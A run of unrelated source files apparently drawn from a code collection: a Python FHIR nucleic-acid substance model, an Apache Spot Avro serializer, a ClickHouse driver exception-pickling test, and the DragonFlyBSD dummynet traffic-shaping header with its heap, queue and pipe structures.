have sequential subscripts.
Type `int`. """
self.sugar = None
""" 5.3.6.8.1 Sugar ID (Mandatory).
List of `SubstanceNucleicAcidSubunitSugar` items (represented as `dict` in JSON). """
self.threePrime = None
""" The nucleotide present at the 3’ terminal shall be specified based
on a controlled vocabulary. Since the sequence is represented from
the 5' to the 3' end, the 5’ prime nucleotide is the letter at the
last position in the sequence. A separate representation would be
redundant.
Type `CodeableConcept` (represented as `dict` in JSON). """
super(SubstanceNucleicAcidSubunit, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(SubstanceNucleicAcidSubunit, self).elementProperties()
js.extend([
("fivePrime", "fivePrime", codeableconcept.CodeableConcept, False, None, False),
("length", "length", int, False, None, False),
("linkage", "linkage", SubstanceNucleicAcidSubunitLinkage, True, None, False),
("sequence", "sequence", str, False, None, False),
("sequenceAttachment", "sequenceAttachment", attachment.Attachment, False, None, False),
("subunit", "subunit", int, False, None, False),
("sugar", "sugar", SubstanceNucleicAcidSubunitSugar, True, None, False),
("threePrime", "threePrime", codeableconcept.CodeableConcept, False, None, False),
])
return js
class SubstanceNucleicAcidSubunitLinkage(backboneelement.BackboneElement):
""" The linkages between sugar residues will also be captured.
"""
resource_type = "SubstanceNucleicAcidSubunitLinkage"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.connectivity = None
""" The entity that links the sugar residues together should also be
captured for nearly all naturally occurring nucleic acid the
linkage is a phosphate group. For many synthetic oligonucleotides
phosphorothioate linkages are often seen. Linkage connectivity is
assumed to be 3’-5’. If the linkage is either 3’-3’ or 5’-5’ this
should be specified.
Type `str`. """
self.identifier = None
""" Each linkage will be registered as a fragment and have an ID.
Type `Identifier` (represented as `dict` in JSON). """
self.name = None
""" Each linkage will be registered as a fragment and have at least one
name. A single name shall be assigned to each linkage.
Type `str`. """
self.residueSite = None
""" Residues shall be captured as described in 5.3.6.8.3.
Type `str`. """
super(SubstanceNucleicAcidSubunitLinkage, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(SubstanceNucleicAcidSubunitLinkage, self).elementProperties()
js.extend([
("connectivity", "connectivity", str, False, None, False),
("identifier", "identifier", identifier.Identifier, False, None, False),
("name", "name", str, False, None, False),
("residueSite", "residueSite", str, False, None, False),
])
return js
class SubstanceNucleicAcidSubunitSugar(backboneelement.BackboneElement):
""" 5.3.6.8.1 Sugar ID (Mandatory).
"""
resource_type = "SubstanceNucleicAcidSubunitSugar"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.identifier = None
""" The Substance ID of the sugar or sugar-like component that make up
the nucleotide.
Type `Identifier` (represented as `dict` in JSON). """
self.name = None
""" The name of the sugar or sugar-like component that make up the
nucleotide.
Type `str`. """
self.residueSite = None
""" The residues that contain a given sugar will be captured. The order
of given residues will be captured in the 5‘-3‘direction consistent
with the base sequences listed above.
Type `str`. """
super(SubstanceNucleicAcidSubunitSugar, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(SubstanceNucleicAcidSubunitSugar, self).elementProperties()
js.extend([
("identifier", "identifier", identifier.Identifier, False, None, False),
("name", "name", str, False, None, False),
("residueSite", "residueSite", str, False, None, False),
])
return js
import sys
try:
from . import attachment
except ImportError:
attachment = sys.modules[__package__ + '.attachment']
try:
from . import codeableconcept
except ImportError:
codeableconcept = sys.modules[__package__ + '.codeableconcept']
try:
from . import identifier
except ImportError:
identifier = sys.modules[__package__ + '.identifier']
| 4,216 |
365 | <reponame>yellingviv/incubator-spot
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
Support custom Avro serializer for transferring data; this can improve performance.
'''
import avro.io
import avro.schema
import io
import logging
AVSC = '''
{
"namespace": "SPOT.INGEST",
"type": "record",
"name": "list.avsc",
"fields": [
{
"name": "list",
"type": [{ "items": "string", "type": "array" }, "null"],
"default": "[]"
}
]
}
'''
def deserialize(rawbytes):
'''
Deserialize given bytes according to the supported Avro schema.
:param rawbytes: A buffered I/O implementation using an in-memory bytes buffer.
:returns : List of ``str`` objects, extracted from the binary stream.
:rtype : ``list``
'''
decoder = avro.io.BinaryDecoder(io.BytesIO(rawbytes))
reader = avro.io.DatumReader(avro.schema.parse(AVSC))
try: return reader.read(decoder)[list.__name__]
except Exception as exc:
logging.getLogger('SPOT.INGEST.COMMON.SERIALIZER')\
.error('[{0}] {1}'.format(exc.__class__.__name__, exc.message))
return []
def serialize(value):
'''
Convert a ``list`` object to an avro-encoded format.
:param value: List of ``str`` objects.
:returns : A buffered I/O implementation using an in-memory bytes buffer.
:rtype : ``str``
'''
writer = avro.io.DatumWriter(avro.schema.parse(AVSC))
rawbytes = io.BytesIO()
try:
writer.write({ list.__name__: value }, avro.io.BinaryEncoder(rawbytes))
return rawbytes
except avro.io.AvroTypeException:
logging.getLogger('SPOT.INGEST.COMMON.SERIALIZER')\
.error('The type of ``{0}`` is not supported by the Avro schema.'
.format(type(value).__name__))
return None
| 968 |
823 | <gh_stars>100-1000
import pickle
import clickhouse_driver.errors as err
def picklable(o):
picked = pickle.loads(pickle.dumps(o))
assert repr(o) == repr(picked)
assert str(o) == str(picked)
def test_exception_picklable():
picklable(err.Error('foo'))
picklable(err.Error(message='foo'))
picklable(err.ServerException('foo', 0, Exception()))
picklable(err.ServerException(message='foo', code=0, nested=Exception()))
| 170 |
432 | <reponame>lambdaxymox/DragonFlyBSD
/*
* Copyright (c) 1998-2002 <NAME>, Universita` di Pisa
* Portions Copyright (c) 2000 Akamba Corp.
* All rights reserved
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* $FreeBSD: src/sys/netinet/ip_dummynet.h,v 1.10.2.9 2003/05/13 09:31:06 maxim Exp $
* $DragonFly: src/sys/net/dummynet/ip_dummynet.h,v 1.19 2008/09/20 04:36:51 sephe Exp $
*/
#ifndef _IP_DUMMYNET_H
#define _IP_DUMMYNET_H
/*
* We start with a heap, which is used in the scheduler to decide when to
* transmit packets etc.
*
* The key for the heap is used for two different values:
*
* 1. Timer ticks- max 10K/second, so 32 bits are enough;
*
* 2. Virtual times. These increase in steps of len/x, where len is the
* packet length, and x is either the weight of the flow, or the sum
* of all weights.
* If we limit to max 1000 flows and a max weight of 100, then x needs
* 17 bits. The packet size is 16 bits, so we can easily overflow if
* we do not allow errors.
*
* So we use a key "dn_key" which is 64 bits.
*
* MY_M is used as a shift count when doing fixed point arithmetic
* (a better name would be useful...).
*/
typedef uint64_t dn_key; /* sorting key */
/*
* Number of left shift to obtain a larger precision
*
* XXX With this scaling, max 1000 flows, max weight 100, 1Gbit/s, the
* virtual time wraps every 15 days.
*/
#define MY_M 16
#ifdef _KERNEL
/*
* A heap entry is made of a key and a pointer to the actual object stored
* in the heap.
*
* The heap is an array of dn_heap_entry entries, dynamically allocated.
* Current size is "size", with "elements" actually in use.
*
* The heap normally supports only ordered insert and extract from the top.
* If we want to extract an object from the middle of the heap, we have to
* know where the object itself is located in the heap (or we need to scan
* the whole array). To this purpose, an object has a field (int) which
* contains the index of the object itself into the heap. When the object
* is moved, the field must also be updated. The offset of the index in the
* object is stored in the 'offset' field in the heap descriptor. The
* assumption is that this offset is non-zero if we want to support extract
* from the middle.
*/
struct dn_heap_entry {
dn_key key; /* sorting key. Topmost element is smallest one */
void *object; /* object pointer */
};
struct dn_heap {
int size;
int elements;
int offset; /* XXX if > 0 this is the offset of direct ptr to obj */
struct dn_heap_entry *p; /* really an array of "size" entries */
};
struct dn_flow_id {
uint16_t fid_type; /* ETHERTYPE_ */
uint16_t pad;
union {
struct {
uint32_t dst_ip;
uint32_t src_ip;
uint16_t dst_port;
uint16_t src_port;
uint8_t proto;
uint8_t flags;
} inet;
} fid_u;
#define fid_dst_ip fid_u.inet.dst_ip
#define fid_src_ip fid_u.inet.src_ip
#define fid_dst_port fid_u.inet.dst_port
#define fid_src_port fid_u.inet.src_port
#define fid_proto fid_u.inet.proto
#define fid_flags fid_u.inet.flags
};
typedef void (*ip_dn_unref_priv_t)(void *);
struct lwkt_port;
/*
* struct dn_pkt identifies a packet in the dummynet queue, but is also used
* to tag packets passed back to the various destinations (ip_input(),
* ip_output() and so on).
*
* It is a tag (PACKET_TAG_DUMMYNET) associated with the actual mbuf.
*/
struct dn_pkt {
struct mbuf *dn_m;
TAILQ_ENTRY(dn_pkt) dn_next;
void *dn_priv;
ip_dn_unref_priv_t dn_unref_priv;
uint32_t dn_flags; /* action when packet comes out. */
#define DN_FLAGS_IS_PIPE 0x10
#define DN_FLAGS_DIR_MASK 0x0f
#define DN_TO_IP_OUT 1
#define DN_TO_IP_IN 2
#define DN_TO_ETH_DEMUX 4
#define DN_TO_ETH_OUT 5
#define DN_TO_MAX 6
dn_key output_time; /* when the pkt is due for delivery */
struct ifnet *ifp; /* interface, for ip_output */
struct sockaddr_in *dn_dst;
struct route ro; /* route, for ip_output. MUST COPY */
int flags; /* flags, for ip_output (IPv6 ?) */
u_short pipe_nr; /* pipe/flow_set number */
u_short pad;
struct dn_flow_id id; /* flow id */
int cpuid; /* target cpuid, for assertion */
struct lwkt_port *msgport; /* target msgport */
};
TAILQ_HEAD(dn_pkt_queue, dn_pkt);
/*
* Overall structure of dummynet (with WF2Q+):
*
* In dummynet, packets are selected with the firewall rules, and passed to
* two different objects: PIPE or QUEUE.
*
* A QUEUE is just a queue with configurable size and queue management policy.
* It is also associated with a mask (to discriminate among different flows),
* a weight (used to give different shares of the bandwidth to different flows)
* and a "pipe", which essentially supplies the transmit clock for all queues
* associated with that pipe.
*
* A PIPE emulates a fixed-bandwidth link, whose bandwidth is configurable.
* The "clock" for a pipe comes from an internal timer. A pipe is also
* associated with one (or more, if masks are used) queue, where all packets
* for that pipe are stored.
*
* The bandwidth available on the pipe is shared by the queues associated with
* that pipe (only one in case the packet is sent to a PIPE) according to the
* WF2Q+ scheduling algorithm and the configured weights.
*
* In general, incoming packets are stored in the appropriate queue, which is
* then placed into one of a few heaps managed by a scheduler to decide when
* the packet should be extracted. The scheduler (a function called dummynet())
* is run at every timer tick, and grabs queues from the head of the heaps when
* they are ready for processing.
*
* There are three data structures definining a pipe and associated queues:
*
* + dn_pipe, which contains the main configuration parameters related to
* delay and bandwidth;
* + dn_flow_set, which contains WF2Q+ configuration, flow masks, plr and
* RED configuration;
* + dn_flow_queue, which is the per-flow queue (containing the packets)
*
* Multiple dn_flow_set can be linked to the same pipe, and multiple
* dn_flow_queue can be linked to the same dn_flow_set.
* All data structures are linked in a linear list which is used for
* housekeeping purposes.
*
* During configuration, we create and initialize the dn_flow_set and dn_pipe
* structures (a dn_pipe also contains a dn_flow_set).
*
* At runtime: packets are sent to the appropriate dn_flow_set (either WFQ
* ones, or the one embedded in the dn_pipe for fixed-rate flows), which in
* turn dispatches them to the appropriate dn_flow_queue (created dynamically
* according to the masks).
*
* The transmit clock for fixed rate flows (ready_event()) selects the
* dn_flow_queue to be used to transmit the next packet. For WF2Q,
* wfq_ready_event() extract a pipe which in turn selects the right flow using
* a number of heaps defined into the pipe itself.
*/
/*
* Per flow queue. This contains the flow identifier, the queue of packets,
* counters, and parameters used to support both RED and WF2Q+.
*
* A dn_flow_queue is created and initialized whenever a packet for a new
* flow arrives.
*/
struct dn_flow_queue {
struct dn_flow_id id;
LIST_ENTRY(dn_flow_queue) q_link;
struct dn_pkt_queue queue; /* queue of packets */
u_int len;
u_int len_bytes;
u_long numbytes; /* credit for transmission (dynamic queues) */
uint64_t tot_pkts; /* statistics counters */
uint64_t tot_bytes;
uint32_t drops;
int hash_slot; /* debugging/diagnostic */
/* RED parameters */
int avg; /* average queue length est. (scaled) */
int count; /* arrivals since last RED drop */
int random; /* random value (scaled) */
uint32_t q_time; /* start of queue idle time */
/* WF2Q+ support */
struct dn_flow_set *fs; /* parent flow set */
int heap_pos; /* position (index) of struct in heap */
dn_key sched_time; /* current time when queue enters ready_heap */
dn_key S, F; /* start time, finish time */
/*
* Setting F < S means the timestamp is invalid. We only need
* to test this when the queue is empty.
*/
};
LIST_HEAD(dn_flowqueue_head, dn_flow_queue);
/*
* flow_set descriptor. Contains the "template" parameters for the queue
* configuration, and pointers to the hash table of dn_flow_queue's.
*
* The hash table is an array of lists -- we identify the slot by hashing
* the flow-id, then scan the list looking for a match.
* The size of the hash table (buckets) is configurable on a per-queue basis.
*
* A dn_flow_set is created whenever a new queue or pipe is created (in the
* latter case, the structure is located inside the struct dn_pipe).
*/
struct dn_flow_set {
u_short fs_nr; /* flow_set number */
u_short flags_fs; /* see 'Flow set flags' */
LIST_ENTRY(dn_flow_set) fs_link;
struct dn_pipe *pipe; /* pointer to parent pipe */
u_short parent_nr; /* parent pipe#, 0 if local to a pipe */
int weight; /* WFQ queue weight */
int qsize; /* queue size in slots or bytes */
int plr; /* pkt loss rate (2^31-1 means 100%) */
struct dn_flow_id flow_mask;
/* hash table of queues onto this flow_set */
int rq_size; /* number of slots */
int rq_elements; /* active elements */
struct dn_flowqueue_head *rq;/* array of rq_size entries */
uint32_t last_expired; /* do not expire too frequently */
int backlogged; /* #active queues for this flowset */
/* RED parameters */
int w_q; /* queue weight (scaled) */
int max_th; /* maximum threshold for queue (scaled) */
int min_th; /* minimum threshold for queue (scaled) */
int max_p; /* maximum value for p_b (scaled) */
u_int c_1; /* max_p/(max_th-min_th) (scaled) */
u_int c_2; /* max_p*min_th/(max_th-min_th) (scaled) */
u_int c_3; /* for GRED, (1-max_p)/max_th (scaled) */
u_int c_4; /* for GRED, 1 - 2*max_p (scaled) */
u_int *w_q_lookup; /* lookup table for computing (1-w_q)^t */
u_int lookup_depth; /* depth of lookup table */
int lookup_step; /* granularity inside the lookup table */
int lookup_weight; /* equal to (1-w_q)^t / (1-w_q)^(t+1) */
int avg_pkt_size; /* medium packet size */
int max_pkt_size; /* max packet size */
};
LIST_HEAD(dn_flowset_head, dn_flow_set);
/*
* Pipe descriptor. Contains global parameters, delay-line queue, and the
* flow_set used for fixed-rate queues.
*
* For WF2Q+ support it also has 3 heaps holding dn_flow_queue:
* + not_eligible_heap, for queues whose start time is higher than the
* virtual time. Sorted by start time.
* + scheduler_heap, for queues eligible for scheduling. Sorted by finish
* time.
* + idle_heap, all flows that are idle and can be removed. We do that on
* each tick so we do not slow down too much operations during forwarding.
*/
struct dn_pipe { /* a pipe */
int pipe_nr; /* number */
int bandwidth; /* really, bytes/tick. */
int delay; /* really, ticks */
struct dn_pkt_queue p_queue;/* packets in delay line */
LIST_ENTRY(dn_pipe) p_link;
/* WF2Q+ */
struct dn_heap scheduler_heap; /* top extract - key Finish time*/
struct dn_heap not_eligible_heap; /* top extract- key Start time */
struct dn_heap idle_heap; /* random extract - key Start=Finish time */
dn_key V; /* virtual time */
int sum; /* sum of weights of all active sessions */
int numbytes; /* bits I can transmit (more or less). */
dn_key sched_time; /* time pipe was scheduled in ready_heap */
struct dn_flow_set fs; /* used with fixed-rate flows */
};
LIST_HEAD(dn_pipe_head, dn_pipe);
struct dn_sopt {
int dn_sopt_name;
void *dn_sopt_arg;
size_t dn_sopt_arglen;
};
typedef int ip_dn_ctl_t(struct dn_sopt *);
typedef int ip_dn_io_t(struct mbuf *);
extern ip_dn_ctl_t *ip_dn_ctl_ptr;
extern ip_dn_io_t *ip_dn_io_ptr;
void ip_dn_queue(struct mbuf *);
void ip_dn_packet_free(struct dn_pkt *);
void ip_dn_packet_redispatch(struct dn_pkt *);
int ip_dn_sockopt(struct sockopt *);
#define DUMMYNET_LOADED (ip_dn_io_ptr != NULL)
#endif /* _KERNEL */
struct dn_ioc_flowid {
uint16_t type; /* ETHERTYPE_ */
uint16_t pad;
union {
struct {
uint32_t dst_ip;
uint32_t src_ip;
uint16_t dst_port;
uint16_t src_port;
uint8_t proto;
uint8_t flags;
} ip;
uint8_t pad[64];
} u;
};
struct dn_ioc_flowqueue {
u_int len;
u_int len_bytes;
uint64_t tot_pkts;
uint64_t tot_bytes;
uint32_t drops;
int hash_slot; /* debugging/diagnostic */
dn_key S; /* virtual start time */
dn_key F; /* virtual finish time */
struct dn_ioc_flowid id;
uint8_t reserved[16];
};
struct dn_ioc_flowset {
u_short fs_type; /* DN_IS_{QUEUE,PIPE}, MUST be first */
u_short fs_nr; /* flow_set number */
u_short flags_fs; /* see 'Flow set flags' */
u_short parent_nr; /* parent pipe#, 0 if local to a pipe */
int weight; /* WFQ queue weight */
int qsize; /* queue size in slots or bytes */
int plr; /* pkt loss rate (2^31-1 means 100%) */
/* Hash table information */
int rq_size; /* number of slots */
int rq_elements; /* active elements */
/* RED parameters */
int w_q; /* queue weight (scaled) */
int max_th; /* maximum threshold for queue (scaled) */
int min_th; /* minimum threshold for queue (scaled) */
int max_p; /* maximum value for p_b (scaled) */
int lookup_step; /* granularity inside the lookup table */
int lookup_weight; /* equal to (1-w_q)^t / (1-w_q)^(t+1) */
struct dn_ioc_flowid flow_mask;
uint8_t reserved[16];
};
struct dn_ioc_pipe {
struct dn_ioc_flowset fs; /* MUST be first */
int pipe_nr; /* pipe number */
int bandwidth; /* bit/second */
int delay; /* milliseconds */
dn_key V; /* virtual time */
uint8_t reserved[16];
};
/*
* Flow set flags
*/
#define DN_HAVE_FLOW_MASK 0x0001
#define DN_IS_RED 0x0002
#define DN_IS_GENTLE_RED 0x0004
#define DN_QSIZE_IS_BYTES 0x0008 /* queue size is measured in bytes */
#define DN_NOERROR 0x0010 /* do not report ENOBUFS on drops */
#define DN_IS_PIPE 0x4000
#define DN_IS_QUEUE 0x8000
/*
* Macros for RED
*/
#define SCALE_RED 16
#define SCALE(x) ((x) << SCALE_RED)
#define SCALE_VAL(x) ((x) >> SCALE_RED)
#define SCALE_MUL(x, y) (((x) * (y)) >> SCALE_RED)
/*
* Maximum pipe number
*/
#define DN_PIPE_NR_MAX 65536
#endif /* !_IP_DUMMYNET_H */
| 5,730 |